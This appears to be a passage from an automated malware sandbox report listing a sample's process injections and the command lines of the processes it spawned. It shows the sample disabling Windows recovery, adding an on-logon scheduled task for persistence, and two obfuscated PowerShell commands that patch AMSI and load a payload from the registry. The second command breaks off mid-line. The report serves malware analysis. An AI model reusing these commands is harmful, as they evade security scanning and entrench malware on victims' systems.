PID 868 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Windows\SysWOW64\cmd.exe
PID 868 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Windows\SysWOW64\cmd.exe
PID 868 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 3524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 1476 wrote to memory of 3524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 1476 wrote to memory of 3524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 868 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 868 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 868 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 868 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 868 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 868 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 868 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 868 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 868 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\server.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 3992 wrote to memory of 1924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3992 wrote to memory of 1924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3992 wrote to memory of 1924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3992 wrote to memory of 1924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3992 wrote to memory of 1924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3992 wrote to memory of 1924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3992 wrote to memory of 1924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3992 wrote to memory of 1924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1924 wrote to memory of 616 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 1924 wrote to memory of 672 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 1924 wrote to memory of 952 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1924 wrote to memory of 64 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 1924 wrote to memory of 4136 N/A C:\Windows\System32\dllhost.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 1924 wrote to memory of 4136 N/A C:\Windows\System32\dllhost.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 1924 wrote to memory of 4136 N/A C:\Windows\System32\dllhost.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 672 wrote to memory of 2764 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 1924 wrote to memory of 512 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1924 wrote to memory of 1044 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1924 wrote to memory of 1060 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1924 wrote to memory of 1064 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1924 wrote to memory of 1192 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1924 wrote to memory of 1200 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1924 wrote to memory of 1280 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1924 wrote to memory of 1308 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1924 wrote to memory of 1432 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SysWOW64\cmd.exe

"cmd" /c reagentc.exe /disable

C:\Windows\SysWOW64\ReAgentc.exe

reagentc.exe /disable

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k swprv

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Users\Admin\AppData\Roaming\server.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9819.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Users\Admin\AppData\Roaming\server.exe"'

C:\Users\Admin\AppData\Roaming\server.exe

"C:\Users\Admin\AppData\Roaming\server.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c reagentc.exe /disable

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}

C:\Windows\SysWOW64\ReAgentc.exe

reagentc.exe /disable

C:\Users\Admin\AppData\Roaming\server.exe

"C:\Users\Admin\AppData\Roaming\server.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rTyxuLWpLrFY{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OGSRborOFjqhRg,[Parameter(Position=1)][Type]$PeCMsKsjLg)$GvBPegEQYWq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'ed'+'D'+'e'+[Char](108)+'e'+'g'+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Mem'+'o'+'ry'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'eT'+[Char](121)+''+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+','+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'i'+'c'+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+'l'+'as'+'s'+''+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+'l'+''+[Char](97)+'ss',[MulticastDelegate]);$GvBPegEQYWq.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+'e'+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+'H'+[Char](105)+'de'+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OGSRborOFjqhRg).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+'g'+''+'e'+''+'d'+'');$GvBPegEQYWq.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+'ke',''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+'i'+''+'g'+''+[Char](44)+'Ne'+[Char](119)+''+'S'+'lot'+','+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$PeCMsKsjLg,$OGSRborOFjqhRg).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'tim'+[Char](101)+','+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $GvBPegEQYWq.CreateType();}$ABVNnMPVUFdQW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+'s'+'o'+''+[Char](102)+''+'t'+''+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+'2'+''+[Char](46)+'U'+[Char](110)+'sa'+'f'+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$hbdKdDMIeLlXzm=$ABVNnMPVUFdQW.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+'ess',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+''+','+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qxNVRloXRoJnhvUVyYk=rTyxuLWpLrFY @([String])([IntPtr]);$hPCwQKGBmnqnhYLJMSMEGl=rTyxuLWpLrFY @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JMtyJTlRyyF=$ABVNnMPVUFdQW.GetMethod('G'+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'n'+'e'+'l'+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+'l'+'l')));$oFIErMbClVKRFT=$hbdKdDMIeLlXzm.Invoke($Null,@([Object]$JMtyJTlRyyF,[Object]('L'+'o'+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$guiTXGWZzZkMhSqOS=$hbdKdDMIeLlXzm.Invoke($Null,@([Object]$JMtyJTlRyyF,[Object](''+[Char](86)+'i'+'r'+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+'c'+'t'+'')));$pFaAvUf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oFIErMbClVKRFT,$qxNVRloXRoJnhvUVyYk).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$fCdJaloLsjsTNWfqH=$hbdKdDMIeLlXzm.Invoke($Null,@([Object]$pFaAvUf,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+'can'+[Char](66)+''+[Char](117)+''+[Char](102)+'fe'+[Char](114)+'')));$LQThsHwgBg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($guiTXGWZzZkMhSqOS,$hPCwQKGBmnqnhYLJMSMEGl).Invoke($fCdJaloLsjsTNWfqH,[uint32]8,4,[ref]$LQThsHwgBg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fCdJaloLsjsTNWfqH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($guiTXGWZzZkMhSqOS,$hPCwQKGBmnqnhYLJMSMEGl).Invoke($fCdJaloLsjsTNWfqH,[uint32]8,0x20,[ref]$LQThsHwgBg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+'$'+''+[Char](55)+''+'7'+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{6afbaf3b-4484-4b72-9cd3-ccba1f5e399f}

C:\Users\Admin\AppData\Roaming\server.exe

"C:\Users\Admin\AppData\Roaming\server.exe"

C:\Windows\SysWOW64\REG.exe

"REG" QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\SysWOW64\cmd.exe

"cmd" /c reagentc.exe /disable

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\ReAgentc.exe

reagentc.exe /disable

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\server.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmpFC61.tmp.bat""

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\server.exe"'

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe

"C:\Windows\system32\config\systemprofile\AppData\Roaming\server.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c reagentc.exe /disable

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}

C:\Windows\SysWOW64\ReAgentc.exe

reagentc.exe /disable

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\server.exe"' & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe

"C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe"

C:\Windows\SysWOW64\REG.exe

"REG" QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\server.exe"'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MlqzyHiElQWL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HlLUVRrXyXxwEs,[Parameter(Position=1)][Type]$tlynJvlLbo)$SnkAJlxmakT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+'M'+'y'+[Char](68)+''+[Char](101)+'l'+'e'+'ga'+'t'+'e'+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'',''+'C'+'la'+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+''+'e'+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+''+[Char](108)+'as'+[Char](115)+'',[MulticastDelegate]);$SnkAJlxmakT.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+'S'+[Char](105)+''+'g'+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$HlLUVRrXyXxwEs).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');$SnkAJlxmakT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'B'+'y'+''+'S'+'ig'+[Char](44)+'N'+[Char](101)+''+[Char](119)+'Sl'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+'i'+''+[Char](114)+'t'+'u'+''+'a'+''+[Char](108)+'',$tlynJvlLbo,$HlLUVRrXyXxwEs).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'an'+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $SnkAJlxmakT.CreateType();}$wQNGLBwpAVNXT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'d'+[Char](108)+'l')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+'n'+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+'n'+''+[Char](115)+'a'+'f'+''+[Char](101)+''+[Char](78)+'a'+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+'t'+''+[Char](104)+''+'o'+''+[Char](100)+'s');$zyekvfWEtKbIXF=$wQNGLBwpAVNXT.GetMethod('G'+'e'+''+'t'+''+'P'+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+'d'+''+'d'+'r'+'e'+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FKFZehJWxVguPEdPqsf=MlqzyHiElQWL @([String])([IntPtr]);$ruHGuPMnoWdwsmpvUdQwwc=MlqzyHiElQWL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$DxyLvcnhHFp=$wQNGLBwpAVNXT.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+'ne'+[Char](108)+''+'3'+''+[Char](50)+'.d'+'l'+'l')));$NdJjZCQSWTMjMf=$zyekvfWEtKbIXF.Invoke($Null,@([Object]$DxyLvcnhHFp,[Object]('L'+[Char](111)+''+[Char](97)+'d'+'L'+'i'+[Char](98)+''+'r'+'a'+'r'+''+[Char](121)+''+'A'+'')));$nnSHxPNFKNNeyESBV=$zyekvfWEtKbIXF.Invoke($Null,@([Object]$DxyLvcnhHFp,[Object](''+'V'+''+'i'+'rtu'+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$PnrXVVp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NdJjZCQSWTMjMf,$FKFZehJWxVguPEdPqsf).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$pdbEjGSgOVqHJUXAS=$zyekvfWEtKbIXF.Invoke($Null,@([Object]$PnrXVVp,[Object]('A'+[Char](109)+''+'s'+'i'+[Char](83)+''+'c'+''+[Char](97)+'nB'+'u'+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$eqSyMBBJLW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nnSHxPNFKNNeyESBV,$ruHGuPMnoWdwsmpvUdQwwc).Invoke($pdbEjGSgOVqHJUXAS,[uint32]8,4,[ref]$eqSyMBBJLW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pdbEjGSgOVqHJUXAS,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nnSHxPNFKNNeyESBV,$ruHGuPMnoWdwsmpvUdQwwc).Invoke($pdbEjGSgOVqHJUXAS,[uint32]8,0x20,[ref]$eqSyMBBJLW);[Reflection.Assembly]::Load([Microsoft.Win32.Regis